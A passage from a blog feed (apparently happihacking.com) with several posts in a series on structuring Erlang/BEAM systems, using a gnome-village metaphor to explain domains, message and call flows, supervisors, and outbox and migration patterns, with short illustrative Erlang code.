&lt;p&gt;Put the four flows around the same boundary and they reinforce each other. A call enters a domain, triggers messages to other domains, moves data through transformations, and runs on supervised processes. Each flow covers a different design question, but they all point to the same contract.&lt;/p&gt;
&lt;p&gt;Every cross-domain message carries the same metadata so tracing, retries, and upgrades stay predictable:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-record(msg_meta, {
    trace_id       :: binary(),
    span_id        :: binary(),
    causation_id   :: binary(),
    schema_version :: integer(),
    idem_key       :: binary(),   % for deduplication
    sent_at        :: integer()   % unix ms
}).
&lt;/code&gt;&lt;/pre&gt;
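&lt;p&gt;Forwarding that metadata is mechanical: a child span keeps the trace id, points &lt;code&gt;causation_id&lt;/code&gt; at the parent span, and gets a fresh span id (the id generator below is an assumption, sketch only):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Derive the metadata for an outgoing message from the one we received.
child_meta(M = #msg_meta{span_id = ParentSpan}) -&amp;gt;
    M#msg_meta{span_id      = new_id(),       % fresh span for this hop
               causation_id = ParentSpan,     % caused by the parent span
               sent_at      = erlang:system_time(millisecond)}.

new_id() -&amp;gt;
    integer_to_binary(erlang:unique_integer([positive])).
&lt;/code&gt;&lt;/pre&gt;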
&lt;p&gt;Tooling hooks sit where the flows live:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trace IDs and causation IDs follow message flow across domain boundaries.&lt;/li&gt;
&lt;li&gt;Mailbox depth, queue lengths, and throughput expose process-flow pressure and health.&lt;/li&gt;
&lt;li&gt;Supervision trees double as topology diagrams and recovery plans.&lt;/li&gt;
&lt;li&gt;Schema registries, contract tests, and version dashboards keep data flow honest.&lt;/li&gt;
&lt;li&gt;Endpoint timeouts and breaker dashboards make call flow visible and tunable.&lt;/li&gt;
&lt;/ul&gt;
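&lt;p&gt;Mailbox depth is cheap to sample with &lt;code&gt;process_info/2&lt;/code&gt;; a sketch of a probe that could feed the backpressure signal (the threshold is an assumption):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Flag a process whose mailbox has crossed the threshold.
mailbox_pressure(Pid, Threshold) -&amp;gt;
    case erlang:process_info(Pid, message_queue_len) of
        {message_queue_len, N} when N &amp;gt; Threshold -&amp;gt; {high, N};
        {message_queue_len, N}                     -&amp;gt; {ok, N};
        undefined                                  -&amp;gt; {error, dead}
    end.
&lt;/code&gt;&lt;/pre&gt;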
&lt;p&gt;Use this primer as a checklist every time you cut a boundary. Define the data contract, message protocol, process topology, and call budget. Once those are in place, the gnomes can work without stepping on each other’s toes.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/687a1ffb261f61d5629a244004b37127.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;Highlight the idempotency contact points: the request owner refuses to start the same job twice, the ledger ignores duplicate trace IDs, and the PSP adapter retries safely. Once those guardrails are in place, replays and retries stop being scary.&lt;/p&gt;
&lt;h1 id=&quot;anti-patterns-and-fixes&quot; tabindex=&quot;-1&quot;&gt;Anti-patterns and fixes&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Data flow:&lt;/strong&gt; Probing foreign ETS tables ties domains together and guarantees stale reads. Publish the facts your domain owns, let other domains subscribe, and derive local views from the feed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Message flow:&lt;/strong&gt; Fire-and-forget without correlation means you never know which request triggered which side effect. Always include correlation/causation IDs and route failures to a dead-letter queue so you can replay with context.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Process flow:&lt;/strong&gt; Unbounded mailboxes hide backpressure until the VM falls over. Cap queues, drop or park excess work deliberately, and surface the metrics so upstream request owners can slow down—the same metrics feed the message-flow backpressure contract.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Call flow:&lt;/strong&gt; Synchronous chains that cross domain boundaries turn every deployment into a distributed transaction. Cut the boundary, emit a message plus an outbox write, and let the receiving domain drive its own timeline.&lt;/p&gt;
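&lt;p&gt;A shape-only sketch of that outbox idea: the fact and the outgoing message land in the same state update, and a separate drain step publishes later (in a real system the outbox rides in the same durable write as the state; &lt;code&gt;apply_authorization/2&lt;/code&gt; and &lt;code&gt;message_bus:publish/1&lt;/code&gt; are placeholders):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% One state update records both the fact and the message: no dual-write.
handle_call({authorize, Req, Meta}, _From, S0 = #state{outbox = Out}) -&amp;gt;
    S1 = apply_authorization(Req, S0),
    S2 = S1#state{outbox = [{payment_authorized, Req, Meta} | Out]},
    {reply, ok, S2, 0}.        % zero timeout: drain the outbox next

handle_info(timeout, S = #state{outbox = Msgs}) -&amp;gt;
    [message_bus:publish(M) || M &amp;lt;- lists:reverse(Msgs)],
    {noreply, S#state{outbox = []}}.
&lt;/code&gt;&lt;/pre&gt;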
&lt;h1 id=&quot;flow-checklist&quot; tabindex=&quot;-1&quot;&gt;Flow checklist&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flow type&lt;/th&gt;
&lt;th&gt;Design focus&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Data flow&lt;/td&gt;
&lt;td&gt;Owner, schema &amp;amp; version, evolution plan, replay/materialization strategy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Message flow&lt;/td&gt;
&lt;td&gt;Command vs event, ordering key, retry/backoff, DLQ, idempotency rule&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process flow&lt;/td&gt;
&lt;td&gt;Supervision strategy, concurrency limits, mailbox bounds, backpressure signal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Call flow&lt;/td&gt;
&lt;td&gt;Sync vs async, timeout budget per hop, breaker policy, fallback/compensation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h1 id=&quot;where-to-next&quot; tabindex=&quot;-1&quot;&gt;Where to next&lt;/h1&gt;
&lt;p&gt;If you have not read the setup, start with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; and &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;. When the flows make sense, jump to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; for a payments-style walkthrough, then stay tuned for the process-archetype deep dive.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Gnomes, Domains, and Flows: Putting It Together&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Domains Own Code and Data</title>
    <link href="https://happihacking.com/blog/posts/2025/domains-own-code-and-data/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/domains-own-code-and-data/</id>
    <summary>Keep modules, OTP apps, and state in the same lane</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/chess.jpg&quot; alt=&quot;Strategy for carving domains&quot; title=&quot;Strategy for carving domains&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;what-domain-means-here&quot; tabindex=&quot;-1&quot;&gt;What “domain” means here&lt;/h1&gt;
&lt;p&gt;“Domain” already carries Domain-Driven Design baggage. I am using the same
word, but a thinner slice. DDD talks about bounded contexts, aggregates,
and ubiquitous language. Those tools are useful, but you do not need the
full ceremony to keep code and state aligned. Here a domain is the smallest
boundary where the data types, invariants, and transformations still belong
together.&lt;/p&gt;
&lt;p&gt;If you already speak DDD, translate this to a bounded context or even a
single aggregate module. If you do not, the rule still works: put the
structs and the logic that operate on them in the same OTP app or module,
treat that unit as the owner, and force everything else to go through a
public API or explicit message.&lt;/p&gt;
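&lt;p&gt;As a sketch, that rule looks like an opaque type plus exported functions, so callers never touch ledger internals (the module and function names are illustrative):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(ledger).
-export([new/0, credit/3, balance/2]).
-export_type([ledger/0]).

-type account() :: binary().
-opaque ledger() :: #{account() =&amp;gt; integer()}.

%% The only way to create or mutate a ledger is through this API.
-spec new() -&amp;gt; ledger().
new() -&amp;gt; #{}.

-spec credit(account(), pos_integer(), ledger()) -&amp;gt; ledger().
credit(Account, Amount, L) when Amount &amp;gt; 0 -&amp;gt;
    maps:update_with(Account, fun(B) -&amp;gt; B + Amount end, Amount, L).

-spec balance(account(), ledger()) -&amp;gt; integer().
balance(Account, L) -&amp;gt;
    maps:get(Account, L, 0).
&lt;/code&gt;&lt;/pre&gt;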
&lt;h1 id=&quot;carving-domains-on-the-beam&quot; tabindex=&quot;-1&quot;&gt;Carving domains on the BEAM&lt;/h1&gt;
&lt;p&gt;On the BEAM, domains map cleanly to modules and applications. A module
defines the types and functions for one area. An OTP application groups
related modules, supervision trees, and configuration. That gives you both
the static boundary (code) and the runtime boundary (process tree).&lt;/p&gt;
&lt;p&gt;Take a payments stack:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;user domain&lt;/strong&gt; owns user structs, validation rules, and identity checks.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;order domain&lt;/strong&gt; owns order records, pricing, and state transitions.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;ledger domain&lt;/strong&gt; owns balances, accounting entries, and append-only logs.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Keep the code and data for each domain in the same module or OTP app so you
can see who owns what. Every process reads the scroll that belongs to the
domain it needs, nothing more. When the ledger lives in its own app, you
know which processes keep the balances, which module updates them, and
where to add tracing or logging for auditors. It also prevents other teams
from “borrowing” ledger state through ETS because that state simply does
not live outside the boundary.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/65a8539d3ca4645d722a689d3eef542d.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;Each box in the diagram is one domain owning its data and behavior. Draw your own version for every system you build, then make sure the codebase mirrors it.&lt;/p&gt;
&lt;h1 id=&quot;spotting-and-fixing-anti-patterns&quot; tabindex=&quot;-1&quot;&gt;Spotting and fixing anti-patterns&lt;/h1&gt;
&lt;p&gt;The common failure is one module juggling multiple domains because “it was
convenient.” You end up with user structs sitting next to payment
calculations and helper processes that touch everything. The fix is
mechanical:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Draw boxes for each domain and list the types and transformations inside.&lt;/li&gt;
&lt;li&gt;Anything that does not fit cleanly in one box belongs in another.&lt;/li&gt;
&lt;li&gt;Move the code, give it a public API, and make callers use the new boundary.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;That diagram also becomes your compliance evidence: it shows which module
owns which data, who can mutate it, and how flows cross the boundary.&lt;/p&gt;
&lt;h1 id=&quot;contracts-not-processes&quot; tabindex=&quot;-1&quot;&gt;Contracts, not processes&lt;/h1&gt;
&lt;p&gt;Once domains are clean, the contracts become obvious. A process still runs
whatever code you load and upgrade, but it calls into a domain with a
stable API and types. Messages carry domain-typed payloads instead of
anonymous maps, and you can trace mutations back to the module that owns
them. Auditors do not care which PID touched the ledger; they care which
domain exposes the write function.&lt;/p&gt;
&lt;p&gt;A process is disposable; a domain API is durable. Optimize for the latter.&lt;/p&gt;
&lt;p&gt;“Code and data live together” means domain modules control the surface
area, while processes remain throwaway workers that call those modules.
Keep that separation clear and the runtime can change shape without
drifting away from the structure.&lt;/p&gt;
&lt;h1 id=&quot;evolution-and-rollouts&quot; tabindex=&quot;-1&quot;&gt;Evolution and rollouts&lt;/h1&gt;
&lt;p&gt;Domains change, but you can keep the blast radius small. Version schemas explicitly and run contract tests at every domain boundary. When an external API shifts, ship a blue/green adapter so you can flip traffic without downtime. For ledgers and other append-only stores, support dual-write plus read-switch migrations: write to both schemas, backfill, then flip readers once parity is proven. Small, well-defined domains make those rollouts boring.&lt;/p&gt;
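&lt;p&gt;The dual-write plus read-switch step can be sketched like this, gated by a config flag (the store modules, &lt;code&gt;migrate_entry/1&lt;/code&gt;, and the flag name are placeholders):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% During migration: append to both schemas, read from whichever is live.
write(Entry) -&amp;gt;
    ok = ledger_v1:append(Entry),
    ok = ledger_v2:append(migrate_entry(Entry)).

read(Key) -&amp;gt;
    case application:get_env(ledger, read_from, v1) of
        v1 -&amp;gt; ledger_v1:lookup(Key);
        v2 -&amp;gt; ledger_v2:lookup(Key)    % flip once parity is proven
    end.
&lt;/code&gt;&lt;/pre&gt;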
&lt;h1 id=&quot;where-to-next&quot; tabindex=&quot;-1&quot;&gt;Where to next&lt;/h1&gt;
&lt;p&gt;Now that the boundaries are clear, read &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; for the four flow checklists, then jump to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; to see the whole frame land in a payments example. If you need the origin story, start with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Gnomes, Domains, and Flows</title>
    <link href="https://happihacking.com/blog/posts/2025/gnomes-domains-flows/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gnomes-domains-flows/</id>
    <summary>Why boundaries decide whether the village holds</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Resource owner = the process that owns mutable state for a domain object.&lt;/li&gt;
&lt;li&gt;Request owner = the process coordinating one user request end-to-end
within a domain.&lt;/li&gt;
&lt;li&gt;Adapter = the boundary process that talks to an external system.&lt;/li&gt;
&lt;li&gt;Orchestration = the domain that coordinates multi-step work across other domains.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Machine parks versus gnome villages&quot; title=&quot;Machine parks versus gnome villages - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;introduction&quot; tabindex=&quot;-1&quot;&gt;Introduction&lt;/h1&gt;
&lt;p&gt;We started this series by meeting the gnomes: tiny BEAM processes with
private backpacks, polite mailboxes, and no interest in shared memory. In
the last post we met their supervisors, the managers who calmly restart
whoever drops a hammer. Together they gave us a village that keeps working
even when a gnome explodes. Processes are cheap, isolation is free, and
supervision trees are better than trust falls.&lt;/p&gt;
&lt;p&gt;Teams still end up with machine parks because they wrap threads in classes,
share mutable state “just this once,” and trust the global lock. When one
thread stalls, everything piles up behind it. Debugging becomes sorting
through shared variables to guess who touched what. Compliance shifts into
endless reviews of access control. In the gnome village you spawn another
process, send a message, restart the failed worker, and keep going.
Predictable beats clever machinery.&lt;/p&gt;
&lt;p&gt;This post is the hinge between the metaphor and the mechanics. Processes
(gnomes) are the runtime, but domains decide how code and state are
organized, and flows define how work travels between them. Align those
three layers and the system stops fighting you. Ignore them and you get
accidental coupling: an API reaching into the wrong ETS table, a supervisor
tree overloaded with synchronous calls, dashboards lighting up because no
one knows where the flow broke. From here on, “resource owner” means “the
process that owns mutable state,” “request owner” is the process running an
end-to-end request, and an “adapter” is the boundary to an external system.&lt;/p&gt;
&lt;h2 id=&quot;compliance-breaks-when-architecture-drifts&quot; tabindex=&quot;-1&quot;&gt;Compliance breaks when architecture drifts&lt;/h2&gt;
&lt;p&gt;At &lt;a href=&quot;https://happihacking.com/talks/fintech-systems-codebeam-2025/&quot;&gt;Code BEAM Berlin&lt;/a&gt; I said
compliance is just good engineering done on purpose. Auditors ask for
logging, isolation, and predictable behavior because those are the only
ways to prove who did what and when. Tie code, state, and runtime behavior
into one lump and you lose that evidence. The regulator is not the problem.
Your architecture is.&lt;/p&gt;
&lt;p&gt;Systems fail when code, state, and call patterns drift apart. You add one
bypass, then a shared cache, then a blocking call in a handler, and
suddenly the code and the runtime disagree. The result is stale data, full
mailboxes, and synchronous chains nobody planned. Fix the boundaries. The
boundaries are what we call domains.&lt;/p&gt;
&lt;h2 id=&quot;processes&quot; tabindex=&quot;-1&quot;&gt;Processes&lt;/h2&gt;
&lt;p&gt;Gnomes are still the core unit. Each process owns its heap, reads scrolls
from the code server, and works under a supervisor that can restart it
without ceremony. Processes are the runtime execution layer; they carry the
work but they do not define the structure. Keep them small, give them one
job, and let supervision trees isolate failure.&lt;/p&gt;
&lt;h2 id=&quot;domains&quot; tabindex=&quot;-1&quot;&gt;Domains&lt;/h2&gt;
&lt;p&gt;Domains are the structural layer. A domain owns its types, invariants, and
transformations. On the BEAM, that means modules and OTP apps that contain
code and state for one bounded area—users, orders, ledgers, adapters.
Domains give the processes something coherent to execute so state does not
drift into random helper modules.&lt;/p&gt;
&lt;h2 id=&quot;flows&quot; tabindex=&quot;-1&quot;&gt;Flows&lt;/h2&gt;
&lt;p&gt;Flows are the choreography layer. They define how calls, messages, data,
and processes move between domains. When the flows are explicit, you know
which protocol crosses each boundary, which process owns each step, and
which metrics tell you when something is stuck. Flows keep the gnomes
polite when they have to cross domain borders.&lt;/p&gt;
&lt;h2 id=&quot;where-we-go-next&quot; tabindex=&quot;-1&quot;&gt;Where we go next&lt;/h2&gt;
&lt;p&gt;From here, hop to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and
Data&lt;/a&gt; for the practical
slicing patterns, then to &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work
Moving&lt;/a&gt; for the checklists.
Finish with &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It
Together&lt;/a&gt; to
see how it lands in a payment-style system. After that we will head into
process archetypes.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/supervisors-are-managers/&quot;&gt;Supervisors Are Managers&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Supervisors Are Managers</title>
    <link href="https://happihacking.com/blog/posts/2025/supervisors-are-managers/"/>
    <updated>2025-11-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/supervisors-are-managers/</id>
    <summary>Build a village of gnomes, not a park of machines.</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_3.jpg&quot; alt=&quot;Manager node with worker nodes&quot; title=&quot;Manager node with worker nodes - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;build-a-village-of-gnomes-not-a-park-of-machines&quot; tabindex=&quot;-1&quot;&gt;Build a Village of Gnomes, Not a Park of Machines&lt;/h1&gt;
&lt;p&gt;In the last post, &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;&lt;em&gt;The Gnome Village&lt;/em&gt;&lt;/a&gt;, we explored how the BEAM turns
concurrency into cooperation.&lt;/p&gt;
&lt;p&gt;Gnomes represent processes: small, isolated
workers with private memory, shared code, and clear message channels. They
take fair turns at the workbench, recover from failure, and never share
state.&lt;/p&gt;
&lt;p&gt;The metaphor captures eight principles that together define the runtime:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Private backpacks (per-process heaps).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Self-cleaning&lt;/strong&gt;: Each gnome cleans its own backpack (per-process GC).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Async messaging&lt;/strong&gt;: Paper mail in mailboxes (message passing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shared code&lt;/strong&gt;: Scrolls on the shelf (hot code loading).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lightweight&lt;/strong&gt;: Cheap to hire (spawn costs microseconds).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fair scheduling&lt;/strong&gt;: Turns at the workbench (reduction-based
preemption).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fault isolation&lt;/strong&gt;: One crash stays local (contained failures).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervision&lt;/strong&gt;: Managers replace workers (recovery trees).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Workbenches are schedulers. Backpacks are heaps. Scrolls are modules.
Mailboxes are message queues. It’s all real BEAM behavior, just viewed
through a lens that focuses on cooperation instead of control.&lt;/p&gt;
&lt;p&gt;Now we come to the eighth principle: &lt;strong&gt;Supervision&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id=&quot;supervisors-are-managers&quot; tabindex=&quot;-1&quot;&gt;Supervisors Are Managers&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Structure work as teams with clear reporting.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/supervisor_tree.jpg&quot; alt=&quot;Manager node with worker nodes&quot; title=&quot;Manager node with worker nodes&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In the gnome village, supervisors are the managers who keep the teams
running smoothly. They don’t do the work themselves. They hire, monitor,
and, when necessary, replace gnomes that fail.&lt;/p&gt;
&lt;p&gt;Each supervisor watches over its workers. When one crashes, the supervisor
decides what to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Restart that worker.&lt;/li&gt;
&lt;li&gt;Restart the whole team.&lt;/li&gt;
&lt;li&gt;Or escalate the problem to a higher supervisor.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The supervisor links are actual process relationships. They are what give
the BEAM its resilience.&lt;/p&gt;
&lt;p&gt;In the machine world, there are no managers, only mechanical linkages.
When one cog breaks, the force ripples through gears and seizes the whole
system. Recovery means shutdown, repair, and restart.&lt;/p&gt;
&lt;p&gt;In the gnome village, failure is expected. Supervisors define how much of
the village must recover when something breaks. If a panini-making gnome crashes,
only the panini line restarts. Salad service continues. Customers barely
notice.&lt;/p&gt;
&lt;h2 id=&quot;how-supervisors-work&quot; tabindex=&quot;-1&quot;&gt;How Supervisors Work&lt;/h2&gt;
&lt;p&gt;Under the hood, supervisors are just gnomes with a specific job: &lt;strong&gt;watch
others&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Each worker process is linked to its supervisor. If it terminates
unexpectedly, the supervisor receives an exit signal. What happens next
depends on the restart strategy defined in the supervisor specification.&lt;/p&gt;
&lt;p&gt;A few key concepts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;One-for-one&lt;/strong&gt;: Replace only the failed worker.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;One-for-all&lt;/strong&gt;: Restart the entire group if one fails.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rest-for-one&lt;/strong&gt;: Restart this worker and everyone started after it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simple-one-for-one&lt;/strong&gt;: Manage dynamically created, similar workers.&lt;/li&gt;
&lt;/ul&gt;
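&lt;p&gt;These strategies are declared in the supervisor&#39;s &lt;code&gt;init/1&lt;/code&gt; callback. A minimal sketch, with illustrative module and child names (&lt;code&gt;village_sup&lt;/code&gt;, &lt;code&gt;panini_gnome&lt;/code&gt; are not from any real system):&lt;/p&gt;

```erlang
%% A minimal supervisor sketch; village_sup and panini_gnome are
%% illustrative names.
-module(village_sup).
-behaviour(supervisor).
-export([start_link/0, init/1]).

start_link() ->
    supervisor:start_link({local, ?MODULE}, ?MODULE, []).

init([]) ->
    SupFlags = #{strategy => one_for_one,  %% replace only the failed worker
                 intensity => 5,           %% at most 5 restarts...
                 period => 10},            %% ...within 10 seconds
    PaniniGnome = #{id => panini_gnome,
                    start => {panini_gnome, start_link, []},
                    restart => permanent},
    {ok, {SupFlags, [PaniniGnome]}}.
```

&lt;p&gt;Swapping &lt;code&gt;one_for_one&lt;/code&gt; for &lt;code&gt;one_for_all&lt;/code&gt; or &lt;code&gt;rest_for_one&lt;/code&gt; changes only the strategy line; the child specifications stay the same.&lt;/p&gt;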
&lt;p&gt;The supervisor itself runs in an endless loop, receiving exit signals,
reacting to crashes, and spawning replacements. If restarts come too fast,
exceeding its configured restart intensity, it gives up and escalates the
failure to its own supervisor instead of looping forever.&lt;/p&gt;
&lt;h2 id=&quot;who-watches-the-watchmen&quot; tabindex=&quot;-1&quot;&gt;Who watches the Watchmen?&lt;/h2&gt;
&lt;p&gt;If a supervisor fails, it too has a supervisor. The chain
continues up to the root of the system, forming a &lt;strong&gt;supervision tree&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The root supervisor is the top of your application. Each
branch defines recovery boundaries. Together they form a living hierarchy
that can self-heal.&lt;/p&gt;
&lt;h2 id=&quot;the-observer&quot; tabindex=&quot;-1&quot;&gt;The Observer&lt;/h2&gt;
&lt;p&gt;Supervisors are one of several &lt;strong&gt;process archetypes&lt;/strong&gt; in the BEAM. They
represent the &lt;em&gt;Observer&lt;/em&gt; archetype, a process whose purpose is to watch
something.&lt;/p&gt;
&lt;p&gt;In the next post, we’ll explore these archetypes, from &lt;strong&gt;Workers&lt;/strong&gt; to
&lt;strong&gt;Servers&lt;/strong&gt; to &lt;strong&gt;Supervisors&lt;/strong&gt;, and see how each plays a role in building
stable, comprehensible systems.&lt;/p&gt;
&lt;p&gt;Until then: build a village of gnomes, not a park of machines.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/the-gnome-village/"/>
    <updated>2025-11-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the-gnome-village/</id>
    <summary>Threads fight. Gnomes cooperate.</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_3.jpg&quot; alt=&quot;The Gnome Village&quot; title=&quot;The Gnome Village - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;The Gnome Village&lt;/h1&gt;
&lt;p&gt;I see some developers arrive at the BEAM carrying mental luggage from
object-oriented or sequential programming.&lt;/p&gt;
&lt;p&gt;In OOP, code and instance are fused: classes and objects are treated as
one. Developers repeat that habit here by confusing code with processes.&lt;/p&gt;
&lt;p&gt;Even I still fall into the trap of
equating code (a module) with a process.&lt;/p&gt;
&lt;p&gt;To break this thought pattern I have introduced the Gnome Village Metaphor (first sketched in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;, and now expanded into this series).&lt;/p&gt;
&lt;h2 id=&quot;gnomes-vs-machines&quot; tabindex=&quot;-1&quot;&gt;Gnomes vs Machines&lt;/h2&gt;
&lt;p&gt;In OOP you tend to build machines of machine parts and wire them tightly.&lt;/p&gt;
&lt;p&gt;The BEAM model is different: code stays in scrolls, state lives inside
gnomes, and the only coupling is the message protocol.&lt;/p&gt;
&lt;p&gt;You can have thousands of tiny workers that never share anything.&lt;/p&gt;
&lt;p&gt;It’s less like a machine built from components and more like a village of
independent workers.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Gnomes vs Machines&quot; title=&quot;Gnomes vs Machines - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;what-a-gnome-is&quot; tabindex=&quot;-1&quot;&gt;What a Gnome Is&lt;/h2&gt;
&lt;p&gt;The gnome is a process. Not an OS thread. Not a fiber with shared state. A
real BEAM process. It lives. It works. It dies. Nothing it does can corrupt
another gnome&#39;s memory. This is the first promise of the village. Local
mistakes stay local.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;private-and-local-memory&quot; tabindex=&quot;-1&quot;&gt;Private and Local Memory&lt;/h2&gt;
&lt;p&gt;Each gnome carries a backpack. In it, it keeps its personal belongings,
data structures, variables, and the current stack of thoughts. No one else
